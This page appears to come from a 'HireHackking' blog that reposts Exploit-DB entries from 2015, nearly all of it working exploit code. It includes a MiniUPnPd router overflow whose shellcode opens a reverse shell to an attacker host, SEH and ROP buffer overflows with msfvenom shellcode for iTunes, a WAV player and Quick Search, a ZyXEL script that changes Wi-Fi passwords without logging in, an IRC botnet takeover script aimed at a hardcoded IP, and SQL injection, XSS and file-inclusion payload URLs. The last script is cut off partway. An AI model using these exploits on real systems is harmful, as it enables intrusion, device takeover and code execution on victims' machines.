Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863128674

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a File Using PoC
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places for the Crash are:
# Statistics > IP Statistics then any of the field you can use.
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistis  > 


buffer = "A"*80000

file = open("wireshark.txt","w")
file.write(buffer)
file.close()

print "POC Created by -Acid"
print " Email: acid.exploit@gmail.com"
HireHackking 
#!/usr/bin/env python

# Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series
# Date: 26.04.2015
# Exploit Author: Onur ALANBEL (BGA)
# Vendor Homepage: http://miniupnp.free.fr/
# Version: 1.0
# Architecture: MIPS
# Tested on: AirTies RT-204v3
# CVE : 2013-0230
# Exploit gives a reverse shell to lhost:lport
# Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf

import urllib2
from string import join
from argparse import ArgumentParser
from struct import pack
from socket import inet_aton

BYTES = 4


def hex2str(value, size=BYTES):
    data = ""

    for i in range(0, size):
        data += chr((value >> (8*i)) & 0xFF)

    data = data[::-1]

    return data


arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \
                            CVE-2013-0230 Reverse Shell exploit for AirTies \
                            RT Series, start netcat on lhost:lport")
arg_parser.add_argument("--target", required=True, help="Target IP address")
arg_parser.add_argument("--lhost", required=True, help="The IP address\
                        which nc is listening")
arg_parser.add_argument("--lport", required=True, type=int, help="The\
                        port which nc is listening")

args = arg_parser.parse_args()

libc_base = 0x2aabd000
ra_1 = hex2str(libc_base + 0x36860)     # ra = 1. gadget
s1 = hex2str(libc_base + 0x1636C)       # s1 = 2. gadget
sleep = hex2str(libc_base + 0x35620)    # sleep function
ra_2 = hex2str(libc_base + 0x28D3C)     # ra = 3. gadget
s6 = hex2str(libc_base + 0x1B19C)       # ra = 4.gadget
s2 = s6
lport = pack('>H', args.lport)
lhost = inet_aton(args.lhost)

shellcode = join([
    "\x24\x11\xff\xff"
    "\x24\x04\x27\x0f"
    "\x24\x02\x10\x46"
    "\x01\x01\x01\x0c"
    "\x1e\x20\xff\xfc"
    "\x24\x11\x10\x2d"
    "\x24\x02\x0f\xa2"
    "\x01\x01\x01\x0c"
    "\x1c\x40\xff\xf8"
    "\x24\x0f\xff\xfa"
    "\x01\xe0\x78\x27"
    "\x21\xe4\xff\xfd"
    "\x21\xe5\xff\xfd"
    "\x28\x06\xff\xff"
    "\x24\x02\x10\x57"
    "\x01\x01\x01\x0c"
    "\xaf\xa2\xff\xff"
    "\x8f\xa4\xff\xff"
    "\x34\x0f\xff\xfd"
    "\x01\xe0\x78\x27"
    "\xaf\xaf\xff\xe0"
    "\x3c\x0e" + lport +
    "\x35\xce" + lport +
    "\xaf\xae\xff\xe4"
    "\x3c\x0e" + lhost[:2] +
    "\x35\xce" + lhost[2:4] +
    "\xaf\xae\xff\xe6"
    "\x27\xa5\xff\xe2"
    "\x24\x0c\xff\xef"
    "\x01\x80\x30\x27"
    "\x24\x02\x10\x4a"
    "\x01\x01\x01\x0c"
    "\x24\x0f\xff\xfd"
    "\x01\xe0\x78\x27"
    "\x8f\xa4\xff\xff"
    "\x01\xe0\x28\x21"
    "\x24\x02\x0f\xdf"
    "\x01\x01\x01\x0c"
    "\x24\x10\xff\xff"
    "\x21\xef\xff\xff"
    "\x15\xf0\xff\xfa"
    "\x28\x06\xff\xff"
    "\x3c\x0f\x2f\x2f"
    "\x35\xef\x62\x69"
    "\xaf\xaf\xff\xec"
    "\x3c\x0e\x6e\x2f"
    "\x35\xce\x73\x68"
    "\xaf\xae\xff\xf0"
    "\xaf\xa0\xff\xf4"
    "\x27\xa4\xff\xec"
    "\xaf\xa4\xff\xf8"
    "\xaf\xa0\xff\xfc"
    "\x27\xa5\xff\xf8"
    "\x24\x02\x0f\xab"
    "\x01\x01\x01\x0c"
    ], '')

payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2\
    + ra_2 + 'C'*32 + shellcode


soap_headers = {
    'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload,
}

soap_data = """
    <?xml version='1.0' encoding="UTF-8"?>
    <SOAP-ENV:Envelope
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    >
    <SOAP-ENV:Body>
    <ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1"\
        SOAP-ENC:root="1">
    </ns1:action>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
    """

try:
    print "Exploiting..."
    req = urllib2.Request("http://" + args.target + ":5555", soap_data,
                          soap_headers)
    res = urllib2.urlopen(req).read()
except:
    print "Ok"
HireHackking 
# Exploit Title: Apple Itunes PLS title buffer overflow
# Date: April 26 ,2015 (Day of disclosing this exploit code)
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Vendor Homepage: http://www.apple.com
# Software Link: http://www.apple.com/itunes/download/?id=890128564
# Version: 10.6.1.7
# Tested on: Windows Xp sp3
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r

header = "[Playlist]\r\n"
header << "NumberOfEntries=1\r\n"
header << "File1=http://www.panix.com/web/faq/multimedia/sample.mp3\r\n"
header << "Title1="

nseh_longer = "\xeb\x1E\x90\x90"
nseh_shorter = "\xeb\x06\x90\x90"
seh = 0x72d119de #pop pop ret from msacm32.drv
shell = "\xdd\xc1\xd9\x74\x24\xf4\xbb\x2b\x2b\x88\x37\x5a\x31\xc9" +
"\xb1\x33\x83\xea\xfc\x31\x5a\x13\x03\x71\x38\x6a\xc2\x79" +
"\xd6\xe3\x2d\x81\x27\x94\xa4\x64\x16\x86\xd3\xed\x0b\x16" +
"\x97\xa3\xa7\xdd\xf5\x57\x33\x93\xd1\x58\xf4\x1e\x04\x57" +
"\x05\xaf\x88\x3b\xc5\xb1\x74\x41\x1a\x12\x44\x8a\x6f\x53" +
"\x81\xf6\x80\x01\x5a\x7d\x32\xb6\xef\xc3\x8f\xb7\x3f\x48" +
"\xaf\xcf\x3a\x8e\x44\x7a\x44\xde\xf5\xf1\x0e\xc6\x7e\x5d" +
"\xaf\xf7\x53\xbd\x93\xbe\xd8\x76\x67\x41\x09\x47\x88\x70" +
"\x75\x04\xb7\xbd\x78\x54\xff\x79\x63\x23\x0b\x7a\x1e\x34" +
"\xc8\x01\xc4\xb1\xcd\xa1\x8f\x62\x36\x50\x43\xf4\xbd\x5e" +
"\x28\x72\x99\x42\xaf\x57\x91\x7e\x24\x56\x76\xf7\x7e\x7d" +
"\x52\x5c\x24\x1c\xc3\x38\x8b\x21\x13\xe4\x74\x84\x5f\x06" +
"\x60\xbe\x3d\x4c\x77\x32\x38\x29\x77\x4c\x43\x19\x10\x7d" +
"\xc8\xf6\x67\x82\x1b\xb3\x98\xc8\x06\x95\x30\x95\xd2\xa4" +
"\x5c\x26\x09\xea\x58\xa5\xb8\x92\x9e\xb5\xc8\x97\xdb\x71" +
"\x20\xe5\x74\x14\x46\x5a\x74\x3d\x25\x3d\xe6\xdd\x84\xd8" +
"\x8e\x44\xd9"
#1020 --> offset in local exploits 
payload = header + "A" * 1020 + nseh_shorter + [seh].pack('V') + shell 
#380  or 404 (if itunes wasn't already loaded)--> offset in remote ones using the itms protocol.
payload_remote =  header + "A" * 380 + nseh_longer + [seh].pack('V') + "A" * 16 + nseh_shorter + [seh].pack('V') +  shell 

# when using as local exploit
open('exploit.pls', 'w') { |f|
  f.puts payload
}
puts('local file created')

# place this in a web server and use the itms:// protocol to load it.
open('exploit_remote.pls', 'w') { |f|
  f.puts payload_remote
}
puts('remote file created')
HireHackking 
#
# legend_rce.py
# Legend Perl IRC Bot Remote Code Execution PoC
# author: Jay Turla ( @shipcod3 )
# description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014. 
# reference: http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html
# greetz to ROOTCON (rootcon.org) goons
#

import socket
import sys

def usage():
     print("USAGE: python legend_rce.py nick")
     print("Sample nicks found in the wild: god, ARZ, Zax, HackTech, TheChozen")
     
def main(argv):
    
    if len(argv) < 2:
        return usage()

    #irc server connection settings
    botnick = sys.argv[1] #admin payload for taking over the Legend Bot
    server = "80.246.50.71" #irc server
    channel = "#Apache" #channel where the bot is located

    irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
    print "connecting to:"+server
    irc.connect((server, 2015)) #connects to the server, you can change the port by changing 2015 for example :)
    irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :legend.rocks\n") #user authentication
    irc.send("NICK "+ botnick +"\n") #sets nick
    irc.send("JOIN "+ channel +"\n") #join the chan
    irc.send("PRIVMSG "+channel+" :!legend @system 'uname -a' \n") #send the payload to the bot

    while 1:    #puts it in a loop
        text=irc.recv(2040)  #receive the text
        print text   #print text to console

        if text.find('PING') != -1:                          #check if 'PING' is found
            irc.send('PONG ' + text.split() [1] + '\r\n') #returns 'PONG' back to the server (prevents pinging out!)
        if text.find('!quit') != -1: #quit the Bot
            irc.send ("QUIT\r\n") 
            sys.exit()
        if text.find('Linux') != -1:                         
            irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
            irc.send ("QUIT\r\n")
            sys.exit()

if __name__ == "__main__":
    main(sys.argv)
HireHackking 
source: https://www.securityfocus.com/bid/52078/info

The Xcomp component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_xcomp&controller=../../[LFI]%00
HireHackking 
source: https://www.securityfocus.com/bid/52076/info
  
Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
  
https://www.example.com/cgi-bin/dansguardian.cgi#addrule[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/52077/info

The X-Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_x-shop&action=artdetail&idd='
HireHackking 
source: https://www.securityfocus.com/bid/52076/info
 
Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
 
https://www.example.com/cgi-bin/dnat.cgi#createrule[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/52076/info

Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. 

https://www.example.com/cgi-bin/openvpn_users.cgi?=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/52063/info

Impulsio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?id=[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/52060/info

JaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/52061/info

R2/Extreme is prone to a stack-based buffer-overflow vulnerability and a directory-traversal vulnerability.

Exploiting these issues may allow remote attackers to execute arbitrary code or retrieve arbitrary files within the context of the affected application.

R2/Extreme 1.65 is vulnerable; other versions may also be affected. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36829.zip
HireHackking 
#!/usr/bin/python

# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# modified SEH Exploit https://www.exploit-db.com/exploits/36826/
# credit to ThreatActor at CoreRed.com
# Software Link: https://www.exploit-db.com/apps/64215b82be8bb2e749f95fec5b51d3e4-FMCRSetup.exe

# Tested on: Windows 7 Ultimate X64
# Added DEP Bypass to the exploit
# naxxo (head@gmail.com)


import struct

def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x004103fe,  # POP EAX # RETN [fcrip.exe] 
      0x004e91f4,  # ptr to &VirtualAlloc() [IAT fcrip.exe]
      0x00418ff8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe] 
      0x00446c97,  # PUSH EAX # POP ESI # POP EBX # RETN [fcrip.exe] 
      0x41414141,  # Filler (compensate)
      0x6f4811f8,  # POP EBP # RETN [vorbisfile.dll] 
      0x1000c5ce,  # & push esp # ret  [libFLAC.dll]
      0x00415bfb,  # POP EBX # RETN [fcrip.exe] 
      0x00000001,  # 0x00000001-> ebx
      0x00415828,  # POP EDX # RETN [fcrip.exe] 
      0x00001000,  # 0x00001000-> edx
      0x10005f62,  # POP ECX # RETN [libFLAC.dll] 
      0x00000040,  # 0x00000040-> ecx
      0x00409967,  # POP EDI # RETN [fcrip.exe] 
      0x00412427,  # RETN (ROP NOP) [fcrip.exe]
      0x00494277,  # POP EAX # RETN [fcrip.exe] 
      0x90909090,  # nop
      0x004c8dc0,  # PUSHAD # RETN [fcrip.exe] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\xff\x0a\x0d'
shellcode =  ""
shellcode += "\xbf\xaa\x7e\xf4\xa0\xd9\xec\xd9\x74\x24\xf4\x5a\x33"
shellcode += "\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x0f\x03\x7a\xa5\x9c"
shellcode += "\x01\x5c\x51\xe2\xea\x9d\xa1\x83\x63\x78\x90\x83\x10"
shellcode += "\x08\x82\x33\x52\x5c\x2e\xbf\x36\x75\xa5\xcd\x9e\x7a"
shellcode += "\x0e\x7b\xf9\xb5\x8f\xd0\x39\xd7\x13\x2b\x6e\x37\x2a"
shellcode += "\xe4\x63\x36\x6b\x19\x89\x6a\x24\x55\x3c\x9b\x41\x23"
shellcode += "\xfd\x10\x19\xa5\x85\xc5\xe9\xc4\xa4\x5b\x62\x9f\x66"
shellcode += "\x5d\xa7\xab\x2e\x45\xa4\x96\xf9\xfe\x1e\x6c\xf8\xd6"
shellcode += "\x6f\x8d\x57\x17\x40\x7c\xa9\x5f\x66\x9f\xdc\xa9\x95"
shellcode += "\x22\xe7\x6d\xe4\xf8\x62\x76\x4e\x8a\xd5\x52\x6f\x5f"
shellcode += "\x83\x11\x63\x14\xc7\x7e\x67\xab\x04\xf5\x93\x20\xab"
shellcode += "\xda\x12\x72\x88\xfe\x7f\x20\xb1\xa7\x25\x87\xce\xb8"
shellcode += "\x86\x78\x6b\xb2\x2a\x6c\x06\x99\x20\x73\x94\xa7\x06"
shellcode += "\x73\xa6\xa7\x36\x1c\x97\x2c\xd9\x5b\x28\xe7\x9e\x94"
shellcode += "\x62\xaa\xb6\x3c\x2b\x3e\x8b\x20\xcc\x94\xcf\x5c\x4f"
shellcode += "\x1d\xaf\x9a\x4f\x54\xaa\xe7\xd7\x84\xc6\x78\xb2\xaa"
shellcode += "\x75\x78\x97\xc8\x18\xea\x7b\x21\xbf\x8a\x1e\x3d"



junk = "A" * 3812
junk+= rop_chain + "\x90" * (308-len(rop_chain)-len(shellcode)) + shellcode

seh  = "\xd8\x2a\x9d\x63" # 0x639d2ad8 : {pivot 1132 / 0x46c} :  # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [vorbis.dll] **   |   {PAGE_EXECUTE_READ}
 

buffer = junk + seh + "\x90" * 800


file = "poc.wav"
f=open(file,"w")
f.write(buffer);
f.close();
HireHackking 
<?php
/*
Exploit Title   : ZYXEL remote configuration editor / Web Server DoS
Date            : 23 April 2015
Exploit Author  : Koorosh Ghorbani
Site            : http://8thbit.net/
Vendor Homepage : http://www.zyxel.com/
Platform        : Hardware 
Tested On       : ZyXEL P-660HN-T1H_IPv6
Firmware Version: 1.02(VLU.0)
--------------------------
 Unattended remote access  
--------------------------
ZYXEL Embedded Software does not check Cookies And Credentials on POST method so 
attackers could changes settings and view pages with post method .

--------------------------
      DoS Web Server
--------------------------
sending empty Post to admin pages will crash internal web server and router needs
to hard reset .

*/
$banner = "   ___ _______ _     ____  _ _______ \r\n" . "  / _ \__   __| |   |  _ \(_)__   __|\r\n" ." | (_) | | |  | |__ | |_) |_   | |   \r\n" ."  > _ <  | |  | '_ \|  _ <| |  | |   \r\n" ." | (_) | | |  | | | | |_) | |  | |   \r\n" ."  \___/  |_|  |_| |_|____/|_|  |_|   \r\n" ."                                     \r\n" ."                                     \r\n";
print $banner;
function Post($packet,$host)
{
	try {
		$curl = curl_init();
		curl_setopt($curl, CURLOPT_URL, $host);
		curl_setopt($curl, CURLOPT_POST, 1);
		curl_setopt($curl, CURLOPT_POSTFIELDS, $packet);
		curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
		curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp");
		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
		$result = curl_exec($curl);
		curl_close($curl);
		return $result;
	}catch (Exception $e ){
		echo $e->getMessage();
		return "" ;
	}
}
if(sizeof($argv) < 3) {
	print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n";
    exit(1);
}
$host = $argv[1];
$password = urlencode($argv[2]);
$packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ;
$target = "http://$host/cgi-bin/WLAN_General.asp";
if(strlen(Post($packet,$target)) > 0){
    print "Seems Changed !";
}else{
    print "Humm , No Chance !";
}
//DoS : Post("",$target) ;
?>
HireHackking 
#!/usr/bin/env perl
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# however he was attemping to vanilla buffer overflow 
# in fact it is SEH based exploit 
# using the address 0x7C9D30D7 is limit the targets
#which I assume belongs to OS file didn't work on win7
#yes he did find a buffer overflow since the offset reaches ESP before SEH
#in this app,  SEH based exploits are more effective and the main vuln in this case should be SEH
#This p0c > win 7s & 8s
# ThreatActor at CoreRed.com 
##

my $file = "p0c.wav";
my $buff = "A" x 4116; # offset to SEH
my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp
my $seh = pack('V', 0x66E42A79); # 66E42A79 5E  POP ESI ogg.dll
my $nop = "\x90" x 28;

#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
my $shell = 
"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" .
"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" .
"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" .
"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" .
"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" .
"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" .
"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" .
"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" .
"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" .
"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" .
"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" .
"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" .
"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" .
"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" .
"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" .
"\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5";

open($FILE,">$file");
print $FILE $buff.$nseh.$seh.$nop.$shell;
close($FILE);
print "+++++++++++++++++++\n";
HireHackking 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps

1. Summary:

    Ultimate Product Catalogue is a responsive and easily customizable
plugin for all your product catalogue needs. It has +59.000 downloads,
+3.000 active installations.

    Unauthenticated SQL injection in ajax call when the plugin is counting
the times a product is being seen by the web visitors. The vulnerable POST
parameter is "Item_ID".

2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:

    In file Functions/Process_Ajax.php line 67:
 [...]
$Item_ID = $_POST['Item_ID'];
        $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name
WHERE Item_ID=" . $Item_ID);
[...]

3. Proof of concept:

    POST /wp-admin/admin-ajax.php HTTP/1.1
  Host: <wordpress host>
  [...]
  Cookie: wordpress_f305[...]

  Item_ID=2 AND SLEEP(5)&action=record_view

4. Solution:

    Update to version 3.1.3
HireHackking 
# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue
wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache
2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps

1. Summary:

     Ultimate Product Catalogue is A responsive and easily customizable
plugin for all your product catalogue needs. It has +59.000 downloads,
+3.000 active installations.

 Unauthenticated SQL injection in parameter "SingleProduct" when a web
visitor explores a product published by the web administrator

2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:

    File Functions/Shortcodes.php line 779

3. Proof of concept

    http://<wordpress site>/?SingleProduct=2'+and+'a'='a
    http://<wordpress site>/?SingleProduct=2'+and+'a'='b

4. Solution:

    Update to version 3.1.3
HireHackking 
#!/usr/bin/perl

###########################################################################=
#######################
# Exploit Title: Quick Search 1.1.0.189 'search textbox' Unicode SEH egghunter Buffer Overflow
# Date: 2015-04-23
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: Quick Search v1.1.0.189
# Vendor Homepage: http://www.glarysoft.com/
# Software Link: https://www.exploit-db.com/apps/93feb6805c08d3ca84b0636a3a986a56-qsearchsetup.exe
# Version: 1.1.0.189
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 93445
###########################################################################=
#######################
# Credits:
# - Vulnerability identified by ariarat
#   http://www.exploit-db.com/exploits/25443/
###########################################################################=
#######################
# Exploit development notes:
# - instead of attaching the process, start the executable within the debugger
#   - the application's module gtms_D7.bpl was not compiled with SafeSEH
#     - since this is a unicode buffer overflow \x00 will not terminate the string
#       - 6 available unicode friendly P/P/R pointers within the module
#         - this exploit should work across different OS versions
#           (tested only on Win XP SP2 EN)
#   - several other unicode friendly aplication modules are available, but have not been checked
###########################################################################=
#######################
# How to exploit:
# - Quick Search -> (click arrow for menu) Match Path -> (click arrow for menu) Full Mode ->=20
#   (paste created exploit string into the search textbox)
#   - once the exploit string is pasted, the egghunter starts to search the memory for the marker
#     - on my test machine the search takes around 30 seconds (until the shellcode gets executed)
#       - during the search the mouse cursor will NOT have a hourglass displayed beside it
#       - during the search the application will NOT become unresponsive (i.e. it will be usable)
###########################################################################=
#######################
# Thanks to:
# - ariarat (PoC)
# - Peter Van Eeckhoutte (exploit development tutorials)
# - Offensive Security (IT security courses, admin support)
###########################################################################=
#######################

my $junk = "A" x 21;

# Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t"
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $egghunter =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
"B9KHHHYCDO4KD1KB3QIQ9OY190IQ9PIQ9PI0IOS13PCPC1313PCOGB11J2J11R8R" .
"0P01100OQRK11OQB102Q1OR02PB0BNP0BORQ11228PPP8Q1PBT50JQ9RUOF0M212" .
"J1Z3IRO3F2O41QB1VP2S20J26RBP3BHRZ2MBVPNRGPLCCOESBCJ2C14482O2O18B" .
"52000P02EB032PTBNBKR92J0L2OBR1E3ICJPLRO0B0URZ0G2KPO1I2W11Q1AA";

my $fill = "C" x (1045 - length($junk.$egghunter));
my $nextSEH = "\x41\x6d";                       # INC ECX; INSW Yz DX
my $SEH = "\x70\x34";                           # POP POP RET from gtms_D7.bpl

# jump to egghunter code
my $allign = "\x58";                            # POP EAX
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x58";                       # POP EAX
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x58";                       # POP EAX
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x05\x01\x11";               # ADD EAX, 0x11000100
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x2d\x09\x11";               # SUB EAX, 0x11000900
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
my $jumptoegghunter = "\x50";                   # PUSH EAX
$jumptoegghunter = $jumptoegghunter."\x6d";     # NOP/remove NULL bytes
$jumptoegghunter = $jumptoegghunter."\xc3";     # RETN

# fill the rest of the stack frame + padding (to avoid a memory area which coverts to upper alpha)
my $fill2 = "D" x 500;

# allign EAX and jump to shellcode
# (this gets executed after the marker is found)
my $allign2 = "\x6d";                           # NOP/remove NULL bytes
$allign2 = $allign2."\x57";                     # PUSH EDI
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\x58";                     # POP EAX
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
